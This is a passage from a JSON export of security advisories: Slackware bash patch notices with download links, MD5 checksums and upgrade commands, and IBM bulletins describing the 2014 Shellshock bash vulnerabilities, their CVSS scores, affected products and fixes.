13.1:\nftp://ftp.slackware.com/pub/slackware/slackware-13.1/patches/packages/bash-4.1.012-i486-2_slack13.1.txz\n\nUpdated package for Slackware x86_64 13.1:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.1/patches/packages/bash-4.1.012-x86_64-2_slack13.1.txz\n\nUpdated package for Slackware 13.37:\nftp://ftp.slackware.com/pub/slackware/slackware-13.37/patches/packages/bash-4.1.012-i486-2_slack13.37.txz\n\nUpdated package for Slackware x86_64 13.37:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.37/patches/packages/bash-4.1.012-x86_64-2_slack13.37.txz\n\nUpdated 
package for Slackware 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/bash-4.2.048-i486-2_slack14.0.txz\n\nUpdated package for Slackware x86_64 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/bash-4.2.048-x86_64-2_slack14.0.txz\n\nUpdated package for Slackware 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/bash-4.2.048-i486-2_slack14.1.txz\n\nUpdated package for Slackware x86_64 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/bash-4.2.048-x86_64-2_slack14.1.txz\n\nUpdated package for Slackware -current:\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/a/bash-4.3.025-i486-2.txz\n\nUpdated package for Slackware x86_64 -current:\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/a/bash-4.3.025-x86_64-2.txz\n\n\nMD5 signatures:\n\nSlackware 13.0 package:\n93780575208505d17b5305b202294e16 bash-3.1.018-i486-2_slack13.0.txz\n\nSlackware x86_64 13.0 package:\n6ec269c8e958cd6265821b480af8e5d7 bash-3.1.018-x86_64-2_slack13.0.txz\n\nSlackware 13.1 package:\n21235413470903bb8eec907acb5b3248 bash-4.1.012-i486-2_slack13.1.txz\n\nSlackware x86_64 13.1 package:\ne69bacaf484e8f924c09eacd91c8c737 bash-4.1.012-x86_64-2_slack13.1.txz\n\nSlackware 13.37 package:\nfa05abe5c8d6557ec1cef124e5d877ce bash-4.1.012-i486-2_slack13.37.txz\n\nSlackware x86_64 13.37 package:\n97a0005c1e0701c8912dc30f8a6f2908 bash-4.1.012-x86_64-2_slack13.37.txz\n\nSlackware 14.0 package:\nd319186a0ab7e85562684669afc878c3 bash-4.2.048-i486-2_slack14.0.txz\n\nSlackware x86_64 14.0 package:\n8835dc729d6029fc20b6b1b1df72ce13 bash-4.2.048-x86_64-2_slack14.0.txz\n\nSlackware 14.1 package:\nfbb4b906de3a8f9bf5209fcc80e2a413 bash-4.2.048-i486-2_slack14.1.txz\n\nSlackware x86_64 14.1 package:\na786b69705d1ebb67fbf31df9d032699 bash-4.2.048-x86_64-2_slack14.1.txz\n\nSlackware -current package:\nbba7e4260df8c4d91d99dbf13d44ec79 a/bash-4.3.025-i486-2.txz\n\nSlackware 
x86_64 -current package:\n7c9a285415bd636469da0cf405bb5692 a/bash-4.3.025-x86_64-2.txz\n\n\nInstallation instructions:\n\nUpgrade the package as root:\n > upgradepkg bash-4.2.048-i486-2_slack14.1.txz", "cvss3": {}, "published": "2014-09-25T20:38:49", "type": "slackware", "title": "[slackware-security] bash", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-7169"], "modified": "2014-09-25T20:38:49", "id": "SSA-2014-268-01", "href": "http://www.slackware.com/security/viewer.php?l=slackware-security&y=2014&m=slackware-security.495008", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-30T07:36:47", "description": "New bash packages are available for Slackware 13.0 to fix a security issue.\n\n\nHere are the details from the Slackware 13.0 ChangeLog:\n\npatches/packages/bash-3.1.018-i486-3_slack13.0.txz: Rebuilt.\n The patch for CVE-2014-7169 needed to be rebased against bash-3.1 in order\n to apply correctly. Thanks to B. Watson for the bug report.\n For more information, see:\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7169\n (* Security fix *)\n\nWhere to find the new packages:\n\nThanks to the friendly folks at the OSU Open Source Lab\n(http://osuosl.org) for donating FTP and rsync hosting\nto the Slackware project! 
:-)\n\nAlso see the \"Get Slack\" section on http://slackware.com for\nadditional mirror sites near you.\n\nUpdated package for Slackware 13.0:\nftp://ftp.slackware.com/pub/slackware/slackware-13.0/patches/packages/bash-3.1.018-i486-3_slack13.0.txz\n\nUpdated package for Slackware x86_64 13.0:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.0/patches/packages/bash-3.1.018-x86_64-3_slack13.0.txz\n\n\nMD5 signatures:\n\nSlackware 13.0 package:\n17fe761daf847490e6286a6c59abd913 bash-3.1.018-i486-3_slack13.0.txz\n\nSlackware x86_64 13.0 package:\n7eb0a4741287042658487f2b6089a4c5 bash-3.1.018-x86_64-3_slack13.0.txz\n\n\nInstallation instructions:\n\nUpgrade the package as root:\n > upgradepkg bash-3.1.018-i486-3_slack13.0.txz", "cvss3": {}, "published": "2014-09-25T16:07:03", "type": "slackware", "title": "bash (rebuild for Slackware 13.0 only)", "bulletinFamily": "unix", "cvss2": {}, "cvelist": ["CVE-2014-7169"], "modified": "2014-09-25T16:07:03", "id": "SSA-2014-0925160703", "href": "http://www.slackware.com/security/viewer.php?l=slackware-security&y=2014&m=slackware-security.309194", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-07-28T14:46:43", "description": "New bash packages are available for Slackware 13.0 to fix a security issue.\n\n\nHere are the details from the Slackware 13.0 ChangeLog:\n\npatches/packages/bash-3.1.018-i486-3_slack13.0.txz: Rebuilt.\n The patch for CVE-2014-7169 needed to be rebased against bash-3.1 in order\n to apply correctly. Thanks to B. Watson for the bug report.\n For more information, see:\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7169\n (* Security fix *)\n\nWhere to find the new packages:\n\nThanks to the friendly folks at the OSU Open Source Lab\n(http://osuosl.org) for donating FTP and rsync hosting\nto the Slackware project! 
:-)\n\nAlso see the \"Get Slack\" section on http://slackware.com for\nadditional mirror sites near you.\n\nUpdated package for Slackware 13.0:\nftp://ftp.slackware.com/pub/slackware/slackware-13.0/patches/packages/bash-3.1.018-i486-3_slack13.0.txz\n\nUpdated package for Slackware x86_64 13.0:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.0/patches/packages/bash-3.1.018-x86_64-3_slack13.0.txz\n\n\nMD5 signatures:\n\nSlackware 13.0 package:\n17fe761daf847490e6286a6c59abd913 bash-3.1.018-i486-3_slack13.0.txz\n\nSlackware x86_64 13.0 package:\n7eb0a4741287042658487f2b6089a4c5 bash-3.1.018-x86_64-3_slack13.0.txz\n\n\nInstallation instructions:\n\nUpgrade the package as root:\n > upgradepkg bash-3.1.018-i486-3_slack13.0.txz", "cvss3": {}, "published": "2014-09-25T23:07:03", "type": "slackware", "title": "SSA-2014-0925230703", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-7169"], "modified": "2014-09-25T23:07:03", "id": "SSA-2014-0925230703", "href": "http://www.slackware.com/security/viewer.php?l=slackware-security&y=2014&m=slackware-security.309194", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "ibm": [{"lastseen": "2022-04-16T23:46:57", "description": "## Summary\n\nIBM Tivoli Workload Scheduler is not vulnerable to CVE-2014-6271 or CVE-2014-7169 Bash vulnerability as shipped out of the box, but action could be required because Tivoli Workload Scheduler installation on AIX through Launchpad requires bash.\n\n## Vulnerability Details\n\nCVE-2014-6271 and 
CVE-2014-7169 vulnerabilities (also called Shellshock) affect Bash that is delivered in Unix platforms. Fixes for Bash will come from Unix distribution. IBM Tivoli Workload Scheduler does not ship bash. \n\n## Affected Products and Versions\n\nEven if Tivoli Workload Scheduler doesn't ship bash, in some cases bash is required: \n\\- Tivoli Workload Scheduler installation for all releases through Launchpad requires bash on AIX and Firefox. \n\\- Tivoli Workload Scheduler 9.1 GA level requires bash for the prerequisite check: TWS 9.1 FP01 removes this requirement. \n\\- the \"version\" command for the following releases: \n8.4 (all fixpacks), 8.5 (all fixpacks but FP05), 8.5.1 (all fixpacks but FP05), 8.6 (GA only). This command is manually issued to display the current version of the product. \n\\- The Tivoli Dynamic Workload Console wastools commands backupConfig.sh and restoreConfig.sh commands require bash in the 9.1 FP01 and 9.2 GA level version. These commands are used to create backups of the current Tivoli Dynamic Workload Console configuration and/or clone it.\n\n## Remediation/Fixes\n\nIBM highly recommends upgrading your bash from your operating system vendor. 
If you cannot apply the fixes for bash please consider the above limitations.\n\n## Workarounds and Mitigations\n\nnone\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v2 Guide](<http://www.first.org/cvss/v2/guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v2](<http://nvd.nist.gov/CVSS-v2-Calculator> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nAccording to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an \"industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response.\" IBM PROVIDES THE CVSS SCORES \"\"AS IS\"\" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. 
CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY.\n\n[{\"Product\":{\"code\":\"SSGSPN\",\"label\":\"IBM Workload Scheduler\"},\"Business Unit\":{\"code\":\"BU053\",\"label\":\"Cloud & Data Platform\"},\"Component\":\"Not Applicable\",\"Platform\":[{\"code\":\"PF002\",\"label\":\"AIX\"},{\"code\":\"PF010\",\"label\":\"HP-UX\"},{\"code\":\"PF016\",\"label\":\"Linux\"},{\"code\":\"PF027\",\"label\":\"Solaris\"}],\"Version\":\"8.4;8.5;8.5.1;8.6;9.1;9.2\",\"Edition\":\"All Editions\",\"Line of Business\":{\"code\":\"LOB45\",\"label\":\"Automation\"}}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-06-17T14:50:13", "type": "ibm", "title": "Security Bulletin: IBM Tivoli Workload Scheduler (CVE-2014-6271, CVE-2014-7169)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-6271", "CVE-2014-7169"], "modified": "2018-06-17T14:50:13", "id": "FEADDA47EFE90B54452280140F698F39B3035C331C1D98DE94C00F9304C7DEFC", "href": "https://www.ibm.com/support/pages/node/252167", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-10T00:00:00", 
"description": "## Summary\n\nVulnerabilities in Bash affect SmartCloud Provisioning for IBM Provided Software Virtual Appliance (CVE-2014-6271, CVE-2014-7169, CVE-2014-7186, CVE-2014-7187).\n\n## Vulnerability Details\n\nSix Bash vulnerabilities were disclosed in September 2014. This bulletin addresses the vulnerabilities that have been referred to as \u201cBash Bug\u201d or \u201cShellshock\u201d and two memory corruption vulnerabilities. \n \n**CVE-ID**: [_CVE-2014-6271_](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271>) \n \n**DESCRIPTION**: GNU Bash could allow a remote attacker to execute arbitrary commands on the system, caused by an error when evaluating specially-crafted environment variables passed to it by the bash functionality. An attacker could exploit this vulnerability to write to files and execute arbitrary commands on the system. \n \nCVSS Base Score: 10.0 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/96153> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:C/I:C/A:C) \n \n \n**CVE-ID**: [_CVE-2014-7169_](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7169>) \n \n**DESCRIPTION**: GNU Bash could allow a remote attacker to execute arbitrary commands on the system, caused by an incomplete fix related to malformed function definitions in the values of environment variables. An attacker could exploit this vulnerability using attack vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server to write to files and execute arbitrary commands on the system. 
\n \nCVSS Base Score: 10.0 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/96209> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:C/I:C/A:C) \n \n**CVE-ID**: [_CVE-2014-7186_](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7186>) \n \n**DESCRIPTION**: GNU Bash could allow a local attacker to execute arbitrary code on the system, caused by an out-of-bounds memory access while handling redir_stack. An attacker could exploit this vulnerability to execute arbitrary code on the system or cause a denial of service. \n \nCVSS Base Score: 4.6 \nCVSS Temporal Score: See _<https://exchange.xforce.ibmcloud.com/vulnerabilities/96237>_ for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:L/AC:L/Au:N/C:P/I:P/A:P) \n \n**CVE-ID**: [_CVE-2014-7187_](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7187>) \n \n**DESCRIPTION**: GNU Bash could allow a local attacker to execute arbitrary code on the system, caused by an off-by-one-error when handling deeply nested flow control constructs. An attacker could exploit this vulnerability to execute arbitrary code on the system or cause a denial of service. 
\n \nCVSS Base Score: 4.6 \nCVSS Temporal Score: See _<https://exchange.xforce.ibmcloud.com/vulnerabilities/96238>_ for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:L/AC:L/Au:N/C:P/I:P/A:P)\n\n## Affected Products and Versions\n\nIBM SmartCloud Provisioning 2.1 FixPack 1 for Software Virtual Appliance to IBM SmartCloud Provisioning 2.1 FixPack 5 for Software Virtual Appliance \nIBM SmartCloud Provisioning 2.1 FixPack 4 Interim Fix 1 for Software Virtual Appliance \n\n## Remediation/Fixes\n\nThe recommended solution is to download the IBM SmartCloud Provisioning 2.1 FixPack 5 for Software Virtual Appliance for Software Virtual Appliance Interim Fix 1 from [_Fix Central_](<http://www-933.ibm.com/support/fixcentral/>) and apply it as soon as practical. \n \nIBM recommends that you review your entire environment to identify vulnerable releases of Bash including your Operating Systems and take appropriate mitigation and remediation actions. Please contact your Operating System provider for more information. \n \nSee the latest **IBM Cloud Orchestrator** fix release on [_IBM Fix Central_](<http://www.ibm.com/support/fixcentral/>). 
\n\n## Workarounds and Mitigations\n\nNone.\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v2 Guide](<http://www.first.org/cvss/v2/guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v2](<http://nvd.nist.gov/CVSS-v2-Calculator> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Change History\n\n* 09 October 2014: Original copy published\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nAccording to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an \"industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response.\" IBM PROVIDES THE CVSS SCORES \"\"AS IS\"\" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. 
CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY.\n\n[{\"Product\":{\"code\":\"SSZH3R\",\"label\":\"IBM Service Agility Accelerator for Cloud\"},\"Business Unit\":{\"code\":\"BU053\",\"label\":\"Cloud & Data Platform\"},\"Component\":\"Security\",\"Platform\":[{\"code\":\"PF016\",\"label\":\"Linux\"}],\"Version\":\"2.1;2.1.0.1;2.1.0.2;2.1.0.3\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB45\",\"label\":\"Automation\"}}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2018-06-17T22:30:11", "type": "ibm", "title": "Security Bulletin: Vulnerabilities in Bash affect SmartCloud Provisioning for IBM Provided Software Virtual Appliance", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-6271", "CVE-2014-7169", "CVE-2014-7186", "CVE-2014-7187"], "modified": "2018-06-17T22:30:11", "id": "03BFD2D26D76C5E7FD24C265B3AB1C4D658726D972FB7039E562EEE0BD578CC0", "href": "https://www.ibm.com/support/pages/node/252647", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-24T00:41:01", "description": "## Summary\n\nSix Bash 
vulnerabilities were disclosed in September 2014. This bulletin addresses the vulnerabilities that have been referred to as \u201cBash Bug\u201d or \u201cShellshock\u201d and two memory corruption vulnerabilities. Bash is used by IBM Security Network Intrusion Prevention System.\n\n## Vulnerability Details\n\n \n**CVE-ID**: [_CVE-2014-6271_](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271>) \n \n**DESCRIPTION**: GNU Bash could allow a remote attacker to execute arbitrary commands on the system, caused by an error when evaluating specially-crafted environment variables passed to it by the bash functionality. An attacker could exploit this vulnerability to write to files and execute arbitrary commands on the system. \n \nCVSS Base Score: 10.0 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/96153_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/96153>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:C/I:C/A:C) \n \n \n**CVE-ID**: [_CVE-2014-7169_](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7169>) \n \n**DESCRIPTION**: GNU Bash could allow a remote attacker to execute arbitrary commands on the system, caused by an incomplete fix related to malformed function definitions in the values of environment variables. An attacker could exploit this vulnerability using attack vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server to write to files and execute arbitrary commands on the system. 
\n \nCVSS Base Score: 10.0 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/96209_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/96209>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:C/I:C/A:C) \n \n \n**CVE-ID**: [_CVE-2014-7186_](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7186>) \n \n**DESCRIPTION**: GNU Bash could allow a local attacker to execute arbitrary code on the system, caused by an out-of-bounds memory access while handling redir_stack. An attacker could exploit this vulnerability to execute arbitrary code on the system or cause a denial of service. \n \nCVSS Base Score: 4.6 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/96237_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/96237>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:L/AC:L/Au:N/C:P/I:P/A:P) \n \n \n**CVE-ID**: [_CVE-2014-7187_](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7187>) \n \n**DESCRIPTION**: GNU Bash could allow a local attacker to execute arbitrary code on the system, caused by an off-by-one-error when handling deeply nested flow control constructs. An attacker could exploit this vulnerability to execute arbitrary code on the system or cause a denial of service. \n \nCVSS Base Score: 4.6 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/96238_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/96238>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:L/AC:L/Au:N/C:P/I:P/A:P) \n \n \n**CVE-ID: **[_CVE-2014-6277_](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6277>) \n \n**DESCRIPTION**: GNU Bash could allow a remote attacker to execute arbitrary code on the system, caused by an incomplete fix related to the failure to properly parse function definitions in the values of environment variables. 
An attacker could exploit this vulnerability using attack vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server to execute arbitrary code on the system or cause a denial of service. \n \nCVSS Base Score: 10.0 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/96686_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/96686>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:C/I:C/A:C) \n \n \n**CVE-ID:**[_CVE-2014-6278_](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6278>) \n \n**DESCRIPTION**: GNU Bash could allow a remote attacker to execute arbitrary code on the system, caused by an incomplete fix related to the parsing of user scripts. An attacker could exploit this vulnerability to execute arbitrary code on the system or cause a denial of service. \n \nCVSS Base Score: 10.0 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/96687_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/96687>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:C/I:C/A:C)\n\n## Affected Products and Versions\n\n**Products: **GX3002, GX4002, GX4004, GX4004-v2, GX5008, GX5008-v2, GX5108, GX5108-v2, GX5208, GX5208-v2, GX6116, GX7412, GX7412-10, GX7412-05, GX7800, GV200, GV1000 \n**Firmware versions: **4.6.2, 4.6.1, 4.6, 4.5, 4.4, and 4.3\n\n## Remediation/Fixes\n\nThe following IBM Threat Fixpacks have the fixes for these vulnerabilities: \n\n * [__4.6.2.0-ISS-ProvG-AllModels-System-FP0002__](<http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=Security+Systems&product=ibm/Tivoli/Proventia+Network+Intrusion+Prevention+System&release=All&platform=All&function=all>)__ \n___for all IBM Security Network Intrusion Prevention System products at Firmware version 4.6.2_\n * 
[__4.6.1.0-ISS-ProvG-AllModels-System-FP0006__](<http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=Security+Systems&product=ibm/Tivoli/Proventia+Network+Intrusion+Prevention+System&release=All&platform=All&function=all>)_ \n__for all IBM Security Network Intrusion Prevention System products at Firmware version 4.6.1_\n * [__4.6.0.0-ISS-ProvG-AllModels-System-FP0004__](<http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=Security+Systems&product=ibm/Tivoli/Proventia+Network+Intrusion+Prevention+System&release=All&platform=All&function=all>)_ \n__for all IBM Security Network Intrusion Prevention System products at Firmware version 4.6_\n * [__4.5.0.0-ISS-ProvG-AllModels-System-FP0006__](<http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=Security+Systems&product=ibm/Tivoli/Proventia+Network+Intrusion+Prevention+System&release=All&platform=All&function=all>)_ \n__for all IBM Security Network Intrusion Prevention System products at Firmware version 4.5_\n * [__4.4.0.0-ISS-ProvG-AllModels-System-FP0006__](<http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=Security+Systems&product=ibm/Tivoli/Proventia+Network+Intrusion+Prevention+System&release=All&platform=All&function=all>)_ \n__for all IBM Security Network Intrusion Prevention System products at Firmware version 4.4_\n * [__4.3.0.0-ISS-ProvG-AllModels-System-FP0004__](<http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=Security+Systems&product=ibm/Tivoli/Proventia+Network+Intrusion+Prevention+System&release=All&platform=All&function=all>) \n_for all IBM Security Network Intrusion Prevention System products at Firmware version 4.3_\n \nIBM recommends that you review your entire environment to identify vulnerable releases of Bash including your Operating Systems and take appropriate mitigation and remediation actions. Please contact your Operating System provider for more information. 
\n\n## Workarounds and Mitigations\n\nNone\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v2 Guide](<http://www.first.org/cvss/v2/guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v2](<http://nvd.nist.gov/CVSS-v2-Calculator> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nAccording to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an \"industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response.\" IBM PROVIDES THE CVSS SCORES \"\"AS IS\"\" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. 
CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY.\n\n[{\"Product\":{\"code\":\"SS9SBT\",\"label\":\"Proventia Network Intrusion Prevention System\"},\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Component\":\"Not Applicable\",\"Platform\":[{\"code\":\"PF009\",\"label\":\"Firmware\"}],\"Version\":\"4.3;4.4;4.5;4.6;4.6.1;4.6.2\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB24\",\"label\":\"Security Software\"}}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2022-02-23T17:14:38", "type": "ibm", "title": "Security Bulletin: Vulnerabilities in Bash affect Network Intrusion Prevention System (CVE-2014-6271, CVE-2014-7169, CVE-2014-7186, CVE-2014-7187, CVE-2014-6277, CVE-2014-6278)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, 